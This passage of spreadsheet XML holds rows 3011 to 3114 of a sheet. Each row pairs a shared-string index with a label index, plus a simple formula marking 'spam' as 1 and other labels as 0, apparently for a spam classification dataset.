    <row r="3011" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3011" t="s">
        <v>8153</v>
      </c>
      <c r="B3011" t="s">
        <v>5294</v>
      </c>
      <c r="C3011" s="1">
        <f>IF(B3011="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3012" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3012" t="s">
        <v>8154</v>
      </c>
      <c r="B3012" t="s">
        <v>5294</v>
      </c>
      <c r="C3012" s="1">
        <f>IF(B3012="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3013" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3013" t="s">
        <v>8155</v>
      </c>
      <c r="B3013" t="s">
        <v>5294</v>
      </c>
      <c r="C3013" s="1">
        <f>IF(B3013="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3014" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3014" t="s">
        <v>8156</v>
      </c>
      <c r="B3014" t="s">
        <v>5297</v>
      </c>
      <c r="C3014" s="1">
        <f>IF(B3014="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3015" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3015" t="s">
        <v>8157</v>
      </c>
      <c r="B3015" t="s">
        <v>5294</v>
      </c>
      <c r="C3015" s="1">
        <f>IF(B3015="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3016" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3016" t="s">
        <v>8158</v>
      </c>
      <c r="B3016" t="s">
        <v>5294</v>
      </c>
      <c r="C3016" s="1">
        <f>IF(B3016="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3017" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3017" t="s">
        <v>8159</v>
      </c>
      <c r="B3017" t="s">
        <v>5294</v>
      </c>
      <c r="C3017" s="1">
        <f>IF(B3017="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3018" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3018" t="s">
        <v>8160</v>
      </c>
      <c r="B3018" t="s">
        <v>5294</v>
      </c>
      <c r="C3018" s="1">
        <f>IF(B3018="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3019" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3019" t="s">
        <v>8161</v>
      </c>
      <c r="B3019" t="s">
        <v>5294</v>
      </c>
      <c r="C3019" s="1">
        <f>IF(B3019="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3020" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3020" t="s">
        <v>8162</v>
      </c>
      <c r="B3020" t="s">
        <v>5294</v>
      </c>
      <c r="C3020" s="1">
        <f>IF(B3020="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3021" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3021" t="s">
        <v>8163</v>
      </c>
      <c r="B3021" t="s">
        <v>5294</v>
      </c>
      <c r="C3021" s="1">
        <f>IF(B3021="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3022" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3022" t="s">
        <v>8164</v>
      </c>
      <c r="B3022" t="s">
        <v>5294</v>
      </c>
      <c r="C3022" s="1">
        <f>IF(B3022="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3023" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3023" t="s">
        <v>8165</v>
      </c>
      <c r="B3023" t="s">
        <v>5294</v>
      </c>
      <c r="C3023" s="1">
        <f>IF(B3023="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3024" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3024" t="s">
        <v>8166</v>
      </c>
      <c r="B3024" t="s">
        <v>5294</v>
      </c>
      <c r="C3024" s="1">
        <f>IF(B3024="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3025" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3025" t="s">
        <v>8167</v>
      </c>
      <c r="B3025" t="s">
        <v>5294</v>
      </c>
      <c r="C3025" s="1">
        <f>IF(B3025="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3026" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3026" t="s">
        <v>8168</v>
      </c>
      <c r="B3026" t="s">
        <v>5294</v>
      </c>
      <c r="C3026" s="1">
        <f>IF(B3026="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3027" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3027" t="s">
        <v>8169</v>
      </c>
      <c r="B3027" t="s">
        <v>5294</v>
      </c>
      <c r="C3027" s="1">
        <f>IF(B3027="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3028" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3028" t="s">
        <v>8170</v>
      </c>
      <c r="B3028" t="s">
        <v>5294</v>
      </c>
      <c r="C3028" s="1">
        <f>IF(B3028="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3029" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3029" t="s">
        <v>8171</v>
      </c>
      <c r="B3029" t="s">
        <v>5294</v>
      </c>
      <c r="C3029" s="1">
        <f>IF(B3029="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3030" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3030" t="s">
        <v>8172</v>
      </c>
      <c r="B3030" t="s">
        <v>5294</v>
      </c>
      <c r="C3030" s="1">
        <f>IF(B3030="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3031" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3031" t="s">
        <v>8173</v>
      </c>
      <c r="B3031" t="s">
        <v>5294</v>
      </c>
      <c r="C3031" s="1">
        <f>IF(B3031="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3032" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3032" t="s">
        <v>8174</v>
      </c>
      <c r="B3032" t="s">
        <v>5294</v>
      </c>
      <c r="C3032" s="1">
        <f>IF(B3032="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3033" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3033" t="s">
        <v>8175</v>
      </c>
      <c r="B3033" t="s">
        <v>5294</v>
      </c>
      <c r="C3033" s="1">
        <f>IF(B3033="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3034" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3034" t="s">
        <v>8176</v>
      </c>
      <c r="B3034" t="s">
        <v>5294</v>
      </c>
      <c r="C3034" s="1">
        <f>IF(B3034="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3035" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3035" t="s">
        <v>8177</v>
      </c>
      <c r="B3035" t="s">
        <v>5294</v>
      </c>
      <c r="C3035" s="1">
        <f>IF(B3035="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3036" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3036" t="s">
        <v>7415</v>
      </c>
      <c r="B3036" t="s">
        <v>5294</v>
      </c>
      <c r="C3036" s="1">
        <f>IF(B3036="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3037" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3037" t="s">
        <v>8178</v>
      </c>
      <c r="B3037" t="s">
        <v>5294</v>
      </c>
      <c r="C3037" s="1">
        <f>IF(B3037="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3038" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3038" t="s">
        <v>8179</v>
      </c>
      <c r="B3038" t="s">
        <v>5294</v>
      </c>
      <c r="C3038" s="1">
        <f>IF(B3038="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3039" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3039" t="s">
        <v>8180</v>
      </c>
      <c r="B3039" t="s">
        <v>5294</v>
      </c>
      <c r="C3039" s="1">
        <f>IF(B3039="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3040" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3040" t="s">
        <v>6048</v>
      </c>
      <c r="B3040" t="s">
        <v>5294</v>
      </c>
      <c r="C3040" s="1">
        <f>IF(B3040="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3041" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3041" t="s">
        <v>8181</v>
      </c>
      <c r="B3041" t="s">
        <v>5294</v>
      </c>
      <c r="C3041" s="1">
        <f>IF(B3041="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3042" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3042" t="s">
        <v>8182</v>
      </c>
      <c r="B3042" t="s">
        <v>5294</v>
      </c>
      <c r="C3042" s="1">
        <f>IF(B3042="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3043" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3043" t="s">
        <v>8183</v>
      </c>
      <c r="B3043" t="s">
        <v>5294</v>
      </c>
      <c r="C3043" s="1">
        <f>IF(B3043="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3044" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3044" t="s">
        <v>8184</v>
      </c>
      <c r="B3044" t="s">
        <v>5294</v>
      </c>
      <c r="C3044" s="1">
        <f>IF(B3044="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3045" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3045" t="s">
        <v>8185</v>
      </c>
      <c r="B3045" t="s">
        <v>5294</v>
      </c>
      <c r="C3045" s="1">
        <f>IF(B3045="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3046" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3046" t="s">
        <v>8186</v>
      </c>
      <c r="B3046" t="s">
        <v>5294</v>
      </c>
      <c r="C3046" s="1">
        <f>IF(B3046="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3047" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3047" t="s">
        <v>8187</v>
      </c>
      <c r="B3047" t="s">
        <v>5294</v>
      </c>
      <c r="C3047" s="1">
        <f>IF(B3047="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3048" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3048" t="s">
        <v>8188</v>
      </c>
      <c r="B3048" t="s">
        <v>5294</v>
      </c>
      <c r="C3048" s="1">
        <f>IF(B3048="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3049" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3049" t="s">
        <v>8189</v>
      </c>
      <c r="B3049" t="s">
        <v>5294</v>
      </c>
      <c r="C3049" s="1">
        <f>IF(B3049="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3050" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3050" t="s">
        <v>8190</v>
      </c>
      <c r="B3050" t="s">
        <v>5294</v>
      </c>
      <c r="C3050" s="1">
        <f>IF(B3050="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3051" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3051" t="s">
        <v>7154</v>
      </c>
      <c r="B3051" t="s">
        <v>5294</v>
      </c>
      <c r="C3051" s="1">
        <f>IF(B3051="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3052" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3052" t="s">
        <v>8191</v>
      </c>
      <c r="B3052" t="s">
        <v>5294</v>
      </c>
      <c r="C3052" s="1">
        <f>IF(B3052="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3053" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3053" t="s">
        <v>8192</v>
      </c>
      <c r="B3053" t="s">
        <v>5294</v>
      </c>
      <c r="C3053" s="1">
        <f>IF(B3053="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3054" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3054" t="s">
        <v>8193</v>
      </c>
      <c r="B3054" t="s">
        <v>5294</v>
      </c>
      <c r="C3054" s="1">
        <f>IF(B3054="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3055" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3055" t="s">
        <v>8194</v>
      </c>
      <c r="B3055" t="s">
        <v>5294</v>
      </c>
      <c r="C3055" s="1">
        <f>IF(B3055="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3056" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3056" t="s">
        <v>6330</v>
      </c>
      <c r="B3056" t="s">
        <v>5297</v>
      </c>
      <c r="C3056" s="1">
        <f>IF(B3056="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3057" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3057" t="s">
        <v>8195</v>
      </c>
      <c r="B3057" t="s">
        <v>5294</v>
      </c>
      <c r="C3057" s="1">
        <f>IF(B3057="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3058" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3058" t="s">
        <v>8196</v>
      </c>
      <c r="B3058" t="s">
        <v>5294</v>
      </c>
      <c r="C3058" s="1">
        <f>IF(B3058="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3059" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3059" t="s">
        <v>8197</v>
      </c>
      <c r="B3059" t="s">
        <v>5297</v>
      </c>
      <c r="C3059" s="1">
        <f>IF(B3059="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3060" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3060" t="s">
        <v>8198</v>
      </c>
      <c r="B3060" t="s">
        <v>5294</v>
      </c>
      <c r="C3060" s="1">
        <f>IF(B3060="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3061" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3061" t="s">
        <v>8199</v>
      </c>
      <c r="B3061" t="s">
        <v>5294</v>
      </c>
      <c r="C3061" s="1">
        <f>IF(B3061="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3062" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3062" t="s">
        <v>8200</v>
      </c>
      <c r="B3062" t="s">
        <v>5294</v>
      </c>
      <c r="C3062" s="1">
        <f>IF(B3062="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3063" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3063" t="s">
        <v>8201</v>
      </c>
      <c r="B3063" t="s">
        <v>5294</v>
      </c>
      <c r="C3063" s="1">
        <f>IF(B3063="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3064" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3064" t="s">
        <v>8202</v>
      </c>
      <c r="B3064" t="s">
        <v>5297</v>
      </c>
      <c r="C3064" s="1">
        <f>IF(B3064="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3065" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3065" t="s">
        <v>8203</v>
      </c>
      <c r="B3065" t="s">
        <v>5294</v>
      </c>
      <c r="C3065" s="1">
        <f>IF(B3065="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3066" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3066" t="s">
        <v>8204</v>
      </c>
      <c r="B3066" t="s">
        <v>5294</v>
      </c>
      <c r="C3066" s="1">
        <f>IF(B3066="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3067" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3067" t="s">
        <v>8205</v>
      </c>
      <c r="B3067" t="s">
        <v>5297</v>
      </c>
      <c r="C3067" s="1">
        <f>IF(B3067="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3068" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3068" t="s">
        <v>8206</v>
      </c>
      <c r="B3068" t="s">
        <v>5294</v>
      </c>
      <c r="C3068" s="1">
        <f>IF(B3068="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3069" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3069" t="s">
        <v>8207</v>
      </c>
      <c r="B3069" t="s">
        <v>5294</v>
      </c>
      <c r="C3069" s="1">
        <f>IF(B3069="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3070" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3070" t="s">
        <v>8208</v>
      </c>
      <c r="B3070" t="s">
        <v>5294</v>
      </c>
      <c r="C3070" s="1">
        <f>IF(B3070="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3071" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3071" t="s">
        <v>8209</v>
      </c>
      <c r="B3071" t="s">
        <v>5294</v>
      </c>
      <c r="C3071" s="1">
        <f>IF(B3071="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3072" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3072" t="s">
        <v>8210</v>
      </c>
      <c r="B3072" t="s">
        <v>5294</v>
      </c>
      <c r="C3072" s="1">
        <f>IF(B3072="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3073" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3073" t="s">
        <v>8211</v>
      </c>
      <c r="B3073" t="s">
        <v>5294</v>
      </c>
      <c r="C3073" s="1">
        <f>IF(B3073="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3074" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3074" t="s">
        <v>8212</v>
      </c>
      <c r="B3074" t="s">
        <v>5294</v>
      </c>
      <c r="C3074" s="1">
        <f>IF(B3074="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3075" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3075" t="s">
        <v>8213</v>
      </c>
      <c r="B3075" t="s">
        <v>5294</v>
      </c>
      <c r="C3075" s="1">
        <f>IF(B3075="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3076" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3076" t="s">
        <v>8214</v>
      </c>
      <c r="B3076" t="s">
        <v>5294</v>
      </c>
      <c r="C3076" s="1">
        <f>IF(B3076="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3077" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3077" t="s">
        <v>8215</v>
      </c>
      <c r="B3077" t="s">
        <v>5294</v>
      </c>
      <c r="C3077" s="1">
        <f>IF(B3077="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3078" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3078" t="s">
        <v>8216</v>
      </c>
      <c r="B3078" t="s">
        <v>5294</v>
      </c>
      <c r="C3078" s="1">
        <f>IF(B3078="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3079" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3079" t="s">
        <v>8217</v>
      </c>
      <c r="B3079" t="s">
        <v>5294</v>
      </c>
      <c r="C3079" s="1">
        <f>IF(B3079="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3080" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3080" t="s">
        <v>8218</v>
      </c>
      <c r="B3080" t="s">
        <v>5294</v>
      </c>
      <c r="C3080" s="1">
        <f>IF(B3080="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3081" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3081" t="s">
        <v>8219</v>
      </c>
      <c r="B3081" t="s">
        <v>5294</v>
      </c>
      <c r="C3081" s="1">
        <f>IF(B3081="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3082" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3082" t="s">
        <v>8220</v>
      </c>
      <c r="B3082" t="s">
        <v>5294</v>
      </c>
      <c r="C3082" s="1">
        <f>IF(B3082="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3083" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3083" t="s">
        <v>8221</v>
      </c>
      <c r="B3083" t="s">
        <v>5294</v>
      </c>
      <c r="C3083" s="1">
        <f>IF(B3083="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3084" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3084" t="s">
        <v>8222</v>
      </c>
      <c r="B3084" t="s">
        <v>5294</v>
      </c>
      <c r="C3084" s="1">
        <f>IF(B3084="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3085" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3085" t="s">
        <v>8223</v>
      </c>
      <c r="B3085" t="s">
        <v>5294</v>
      </c>
      <c r="C3085" s="1">
        <f>IF(B3085="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3086" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3086" t="s">
        <v>8224</v>
      </c>
      <c r="B3086" t="s">
        <v>5294</v>
      </c>
      <c r="C3086" s="1">
        <f>IF(B3086="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3087" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3087" t="s">
        <v>8225</v>
      </c>
      <c r="B3087" t="s">
        <v>5294</v>
      </c>
      <c r="C3087" s="1">
        <f>IF(B3087="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3088" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3088" t="s">
        <v>8226</v>
      </c>
      <c r="B3088" t="s">
        <v>5294</v>
      </c>
      <c r="C3088" s="1">
        <f>IF(B3088="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3089" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3089" t="s">
        <v>8227</v>
      </c>
      <c r="B3089" t="s">
        <v>5294</v>
      </c>
      <c r="C3089" s="1">
        <f>IF(B3089="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3090" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3090" t="s">
        <v>5819</v>
      </c>
      <c r="B3090" t="s">
        <v>5294</v>
      </c>
      <c r="C3090" s="1">
        <f>IF(B3090="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3091" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3091" t="s">
        <v>8228</v>
      </c>
      <c r="B3091" t="s">
        <v>5294</v>
      </c>
      <c r="C3091" s="1">
        <f>IF(B3091="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3092" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3092" t="s">
        <v>8229</v>
      </c>
      <c r="B3092" t="s">
        <v>5297</v>
      </c>
      <c r="C3092" s="1">
        <f>IF(B3092="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3093" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3093" t="s">
        <v>8230</v>
      </c>
      <c r="B3093" t="s">
        <v>5294</v>
      </c>
      <c r="C3093" s="1">
        <f>IF(B3093="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3094" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3094" t="s">
        <v>8231</v>
      </c>
      <c r="B3094" t="s">
        <v>5294</v>
      </c>
      <c r="C3094" s="1">
        <f>IF(B3094="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3095" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3095" t="s">
        <v>8232</v>
      </c>
      <c r="B3095" t="s">
        <v>5294</v>
      </c>
      <c r="C3095" s="1">
        <f>IF(B3095="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3096" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3096" t="s">
        <v>8233</v>
      </c>
      <c r="B3096" t="s">
        <v>5294</v>
      </c>
      <c r="C3096" s="1">
        <f>IF(B3096="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3097" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3097" t="s">
        <v>8234</v>
      </c>
      <c r="B3097" t="s">
        <v>5294</v>
      </c>
      <c r="C3097" s="1">
        <f>IF(B3097="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3098" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3098" t="s">
        <v>8235</v>
      </c>
      <c r="B3098" t="s">
        <v>5294</v>
      </c>
      <c r="C3098" s="1">
        <f>IF(B3098="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3099" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3099" t="s">
        <v>8236</v>
      </c>
      <c r="B3099" t="s">
        <v>5294</v>
      </c>
      <c r="C3099" s="1">
        <f>IF(B3099="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3100" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3100" t="s">
        <v>8237</v>
      </c>
      <c r="B3100" t="s">
        <v>5294</v>
      </c>
      <c r="C3100" s="1">
        <f>IF(B3100="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3101" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3101" t="s">
        <v>7343</v>
      </c>
      <c r="B3101" t="s">
        <v>5294</v>
      </c>
      <c r="C3101" s="1">
        <f>IF(B3101="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3102" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3102" t="s">
        <v>8238</v>
      </c>
      <c r="B3102" t="s">
        <v>5294</v>
      </c>
      <c r="C3102" s="1">
        <f>IF(B3102="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3103" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3103" t="s">
        <v>8239</v>
      </c>
      <c r="B3103" t="s">
        <v>5294</v>
      </c>
      <c r="C3103" s="1">
        <f>IF(B3103="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3104" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3104" t="s">
        <v>8240</v>
      </c>
      <c r="B3104" t="s">
        <v>5294</v>
      </c>
      <c r="C3104" s="1">
        <f>IF(B3104="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3105" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3105" t="s">
        <v>8241</v>
      </c>
      <c r="B3105" t="s">
        <v>5294</v>
      </c>
      <c r="C3105" s="1">
        <f>IF(B3105="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3106" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3106" t="s">
        <v>8242</v>
      </c>
      <c r="B3106" t="s">
        <v>5294</v>
      </c>
      <c r="C3106" s="1">
        <f>IF(B3106="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3107" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3107" t="s">
        <v>8243</v>
      </c>
      <c r="B3107" t="s">
        <v>5294</v>
      </c>
      <c r="C3107" s="1">
        <f>IF(B3107="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3108" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3108" t="s">
        <v>8244</v>
      </c>
      <c r="B3108" t="s">
        <v>5294</v>
      </c>
      <c r="C3108" s="1">
        <f>IF(B3108="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3109" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3109" t="s">
        <v>8245</v>
      </c>
      <c r="B3109" t="s">
        <v>5294</v>
      </c>
      <c r="C3109" s="1">
        <f>IF(B3109="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3110" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3110" t="s">
        <v>8246</v>
      </c>
      <c r="B3110" t="s">
        <v>5294</v>
      </c>
      <c r="C3110" s="1">
        <f>IF(B3110="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3111" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3111" t="s">
        <v>8247</v>
      </c>
      <c r="B3111" t="s">
        <v>5297</v>
      </c>
      <c r="C3111" s="1">
        <f>IF(B3111="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3112" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3112" t="s">
        <v>8248</v>
      </c>
      <c r="B3112" t="s">
        <v>5294</v>
      </c>
      <c r="C3112" s="1">
        <f>IF(B3112="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3113" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3113" t="s">
        <v>8249</v>
      </c>
      <c r="B3113" t="s">
        <v>5294</v>
      </c>
      <c r="C3113" s="1">
        <f>IF(B3113="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3114" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3114" t="s">
        <v>8250</v>
      </c>
      <c r="B3114" t="s">
        <v>5294</v>
      </c>
      <c r="C3114" s="1">
        <f>IF(B3114="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
